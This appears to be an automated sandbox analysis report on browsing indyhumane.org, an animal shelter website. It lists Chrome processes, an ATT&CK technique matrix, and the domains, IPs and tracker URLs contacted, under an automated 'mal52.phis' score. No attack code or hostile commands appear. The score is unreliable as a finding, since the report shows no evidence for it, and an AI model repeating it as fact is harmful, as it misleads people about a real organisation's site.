Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5596_945643390\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_5596_785074010Jump to behavior
Source: classification engineClassification label: mal52.phis.win@23/342@125/41
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1612,i,14363034678728640408,9950297544825617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://indyhumane.org"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1612,i,14363034678728640408,9950297544825617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management InstrumentationPath Interception1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://indyhumane.org0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://indyhumane.org/about/ways-to-give/0%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/inc/assets/dist/landingpage-front.css?ver=10.4.20%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e140%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e60%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/style.css?ver=6.7.10%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.20%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.30%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac60%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.p0%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/uploads/2021/05/cat-on-bed-768x356.png0%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.20%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/thrive-dashboard/js/dist/fronte0%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-includes/js/imagesloaded.min.js?ver=5.0.00%Avira URL Cloudsafe
https://indyhumane.org/?gf_page=preview&amp;id=50%Avira URL Cloudsafe
https://adoptionapplication.petpoint.com/?animalId=0%Avira URL Cloudsafe
https://149955744.v2.pressablecdn.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.40%Avira URL Cloudsafe
https://indyhumane.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Findyhumane.org%2F&#038;format=xml0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
stats.g.doubleclick.net
173.194.76.154
truefalse
    high
    scontent.xx.fbcdn.net
    157.240.0.6
    truefalse
      high
      idsync.rlcdn.com
      35.244.174.68
      truefalse
        high
        pixel.sitescout.com
        98.98.135.24
        truefalse
          high
          d23d3wcthtl67x.cloudfront.net
          65.9.66.85
          truefalse
            unknown
            sync.crwdcntrl.net
            52.49.239.226
            truefalse
              high
              cm.g.doubleclick.net
              216.58.212.162
              truefalse
                high
                www.google.com
                142.250.186.100
                truefalse
                  high
                  dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                  34.249.77.207
                  truefalse
                    high
                    indyhumane.org
                    199.16.172.26
                    truefalse
                      unknown
                      star-mini.c10r.facebook.com
                      157.240.0.35
                      truefalse
                        high
                        pixel.tapad.com
                        34.111.113.62
                        truefalse
                          high
                          us-u.openx.net
                          34.98.64.218
                          truefalse
                            high
                            virtual.urban-orthodontics.com
                            185.76.79.50
                            truefalse
                              high
                              s-part-0017.t-0009.t-msedge.net
                              13.107.246.45
                              truefalse
                                high
                                fei.pro-market.net
                                107.178.240.89
                                truefalse
                                  high
                                  pixel-sync.sitescout.com
                                  34.36.216.150
                                  truefalse
                                    high
                                    pug-lhr-bc.pubmnet.com
                                    185.64.191.210
                                    truefalse
                                      high
                                      analytics-alv.google.com
                                      216.239.32.181
                                      truefalse
                                        high
                                        leatherbook.org
                                        185.121.15.137
                                        truefalse
                                          high
                                          googleads.g.doubleclick.net
                                          142.250.185.226
                                          truefalse
                                            high
                                            sb.scorecardresearch.com
                                            18.244.18.38
                                            truefalse
                                              high
                                              gaug.es
                                              44.219.163.77
                                              truefalse
                                                high
                                                td.doubleclick.net
                                                142.250.181.226
                                                truefalse
                                                  high
                                                  centro.vo.llnwd.net
                                                  41.63.96.2
                                                  truefalse
                                                    high
                                                    load-euw1.exelator.com
                                                    34.254.143.3
                                                    truefalse
                                                      high
                                                      ib.anycast.adnxs.com
                                                      185.89.210.153
                                                      truefalse
                                                        high
                                                        149955744.v2.pressablecdn.com
                                                        192.0.77.39
                                                        truefalse
                                                          unknown
                                                          secure.gaug.es
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            insiderdata360online.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              image2.pubmatic.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                up.pixel.ad
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  dpm.demdex.net
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    www.facebook.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      g.petango.com
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        cdn.customgpt.ai
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          connect.facebook.net
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            analytics.google.com
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              ib.adnxs.com
                                                                              unknown
                                                                              unknownfalse
                                                                                high
                                                                                loadm.exelator.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                  https://sb.scorecardresearch.com/b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9=false
                                                                                    high
                                                                                    https://g.petango.com/photos/352/a625a6f1-50ea-4357-b907-a08d636341db.jpgfalse
                                                                                      high
                                                                                      https://149955744.v2.pressablecdn.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6false
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGETfalse
                                                                                        high
                                                                                        https://g.petango.com/photos/352/9c7b31b0-07c0-40bd-b310-3075efde3ec6.jpgfalse
                                                                                          high
                                                                                          https://sb.scorecardresearch.com/b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9=false
                                                                                            high
                                                                                            https://ib.adnxs.com/bounce?%2Fsetuid%3Fentity%3D133%26code%3D49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553%26gdpr%3D0%26gdpr_consent%3Dfalse
                                                                                              high
                                                                                              https://dpm.demdex.net/ibs:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=false
                                                                                                high
                                                                                                https://pixel.tapad.com/idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553false
                                                                                                  high
                                                                                                  https://g.petango.com/photos/352/6ff84da6-dadf-4c18-b0cb-b36ae750aa72.jpgfalse
                                                                                                    high
                                                                                                    https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3false
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/style.css?ver=6.7.1false
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387965322&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&rqm=FGETfalse
                                                                                                      high
                                                                                                      https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/inc/assets/dist/landingpage-front.css?ver=10.4.2false
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://149955744.v2.pressablecdn.com/wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14false
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5NjkmdGw9MTI5NjAw&piggybackCookie=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent=false
                                                                                                        high
                                                                                                        https://us-u.openx.net/w/1.0/sd?id=537072977&val=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent=false
                                                                                                          high
                                                                                                          https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.2false
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://149955744.v2.pressablecdn.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6false
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://g.petango.com/photos/352/6a80bfbe-5e6a-4206-8bd9-f6497d49bc0c.jpgfalse
                                                                                                            high
                                                                                                            https://sb.scorecardresearch.com/b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387962834&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&c8=Adoptable%20Cats%20-%20IndyHumane&c9=https%3A%2F%2Findyhumane.org%2Ffalse
                                                                                                              high
                                                                                                              https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.2false
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://pixel.tapad.com/idsync/ex/receive?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553false
                                                                                                                high
                                                                                                                https://www.facebook.com/tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973169&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GETfalse
                                                                                                                  high
                                                                                                                  https://149955744.v2.pressablecdn.com/wp-includes/js/imagesloaded.min.js?ver=5.0.0false
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://149955744.v2.pressablecdn.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4false
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://g.petango.com/photos/352/c74a3261-0887-4eef-a819-4790e9521a1b.jpgfalse
                                                                                                                    high
                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                    https://wieistmeineip.desets.json.0.drfalse
                                                                                                                      high
                                                                                                                      https://mercadoshops.com.cosets.json.0.drfalse
                                                                                                                        high
                                                                                                                        https://mercadolivre.comsets.json.0.drfalse
                                                                                                                          high
                                                                                                                          https://indyhumane.org/about/ways-to-give/chromecache_388.2.drtrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://ampcid.google.com/v1/publisher:getClientIdchromecache_390.2.dr, chromecache_285.2.drfalse
                                                                                                                            high
                                                                                                                            https://medonet.plsets.json.0.drfalse
                                                                                                                              high
                                                                                                                              https://mercadoshops.com.brsets.json.0.drfalse
                                                                                                                                high
                                                                                                                                https://johndeere.comsets.json.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://baomoi.comsets.json.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://elfinancierocr.comsets.json.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://bolasport.comsets.json.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://desimartini.comsets.json.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://hearty.appsets.json.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://mercadoshops.comsets.json.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://nlc.husets.json.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://p106.netsets.json.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://radio2.besets.json.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://songshare.comsets.json.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://smaker.plsets.json.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://149955744.v2.pressablecdn.com/wp-content/uploads/2021/05/cat-on-bed-768x356.pngchromecache_388.2.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://p24.husets.json.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://24.husets.json.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://mightytext.netsets.json.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://hazipatika.comsets.json.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://joyreactor.comsets.json.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://wildixin.comsets.json.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://eworkbookcloud.comsets.json.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://chennien.comsets.json.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://drimer.travelsets.json.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://mercadopago.clsets.json.0.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://naukri.comsets.json.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://interia.plsets.json.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://bonvivir.comsets.json.0.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://sapo.iosets.json.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://wpext.plsets.json.0.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://welt.desets.json.0.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://poalim.sitesets.json.0.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://drimer.iosets.json.0.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://infoedgeindia.comsets.json.0.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://blackrockadvisorelite.itsets.json.0.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://149955744.v2.pressablecdn.com/wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.pchromecache_388.2.drfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://cognitive-ai.rusets.json.0.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://cafemedia.comsets.json.0.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://graziadaily.co.uksets.json.0.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://thirdspace.org.ausets.json.0.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://mercadoshops.com.arsets.json.0.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://jqueryui.comchromecache_244.2.dr, chromecache_406.2.dr, chromecache_327.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://commentcamarche.comsets.json.0.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://rws3nvtvt.comsets.json.0.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://mercadolivre.com.brsets.json.0.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://clmbtech.comsets.json.0.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontechromecache_388.2.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://salemovefinancial.comsets.json.0.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://mercadopago.com.brsets.json.0.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://commentcamarche.netsets.json.0.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://hj.rssets.json.0.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://hearty.mesets.json.0.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://mercadolibre.com.gtsets.json.0.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://indiatodayne.insets.json.0.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://idbs-staging.comsets.json.0.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://mercadolibre.co.crsets.json.0.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://clickserv.sitescout.com/conv/chromecache_213.2.dr, chromecache_231.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://prisjakt.nosets.json.0.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://kompas.comsets.json.0.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://wingify.comsets.json.0.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://player.plsets.json.0.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://indyhumane.org/?gf_page=preview&amp;id=5chromecache_388.2.drtrue
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://mercadopago.com.arsets.json.0.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://mercadolibre.com.hnsets.json.0.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://indyhumane.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Findyhumane.org%2F&#038;format=xmlchromecache_388.2.drtrue
                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://tucarro.com.cosets.json.0.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://adoptionapplication.petpoint.com/?animalId=chromecache_388.2.drfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://een.besets.json.0.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                        199.16.172.26
                                                                                                                                                                                                                                                        indyhumane.orgUnited States
                                                                                                                                                                                                                                                        2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                                        65.9.66.19
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        173.194.76.154
                                                                                                                                                                                                                                                        stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        185.89.210.153
                                                                                                                                                                                                                                                        ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                                        29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                        142.250.185.226
                                                                                                                                                                                                                                                        googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        44.219.163.77
                                                                                                                                                                                                                                                        gaug.esUnited States
                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                        34.249.77.207
                                                                                                                                                                                                                                                        dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        157.240.252.13
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                        34.254.143.3
                                                                                                                                                                                                                                                        load-euw1.exelator.comUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        142.250.185.66
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        18.244.18.32
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        216.239.32.181
                                                                                                                                                                                                                                                        analytics-alv.google.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        157.240.0.35
                                                                                                                                                                                                                                                        star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                        192.0.77.39
                                                                                                                                                                                                                                                        149955744.v2.pressablecdn.comUnited States
                                                                                                                                                                                                                                                        2635AUTOMATTICUSfalse
                                                                                                                                                                                                                                                        18.244.18.38
                                                                                                                                                                                                                                                        sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                                        65.9.66.85
                                                                                                                                                                                                                                                        d23d3wcthtl67x.cloudfront.netUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        172.217.23.100
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        142.250.186.100
                                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        35.244.174.68
                                                                                                                                                                                                                                                        idsync.rlcdn.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        216.58.212.162
                                                                                                                                                                                                                                                        cm.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        52.17.153.181
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        37.252.171.85
                                                                                                                                                                                                                                                        unknownEuropean Union
                                                                                                                                                                                                                                                        29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                        185.76.79.50
                                                                                                                                                                                                                                                        virtual.urban-orthodontics.comSpain
                                                                                                                                                                                                                                                        50129TVHORADADAESfalse
                                                                                                                                                                                                                                                        74.125.133.154
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        185.64.191.210
                                                                                                                                                                                                                                                        pug-lhr-bc.pubmnet.comUnited Kingdom
                                                                                                                                                                                                                                                        62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                        157.240.0.6
                                                                                                                                                                                                                                                        scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                        35.244.159.8
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        107.178.240.89
                                                                                                                                                                                                                                                        fei.pro-market.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
